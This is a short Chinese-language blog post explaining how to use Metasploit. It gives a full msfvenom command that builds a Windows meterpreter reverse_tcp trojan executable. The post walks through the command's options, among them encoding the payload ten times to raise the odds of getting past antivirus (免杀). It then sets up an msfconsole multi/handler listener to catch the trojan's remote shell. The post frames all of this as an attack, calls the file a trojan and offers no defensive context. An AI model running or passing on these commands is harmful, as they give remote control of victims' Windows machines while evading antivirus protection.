当前位置:   article > 正文

msf使用方法_msfconsole windows

msfconsole windows

1.生成木马

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=8088 -f exe -o /root/test.exe

参数:
-a x86 使用x86框架
–platform windows 运行平台为windows
-p windows/meterpreter/reverse_tcp 指定payload
LHOST=192.168.200.130 LPORT=8088 本地IP和监听端口
-b “\x00” 去掉坏字符
-i 10 编码10次,提高免杀概率
-f exe 木马文件格式
-o /var/www/html/test.exe 输出路径

2.在msf下进入到侦听模块中

msfconsole //启动

use exploit/multi/handler //开启监听

set payload windows/meterpreter/reverse_tcp //设置payload,选择漏洞利用模块

set lhost 192.168.36.150 //本地IP,即攻击IP

set lport 5577 //监听端口

exploit //攻击

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号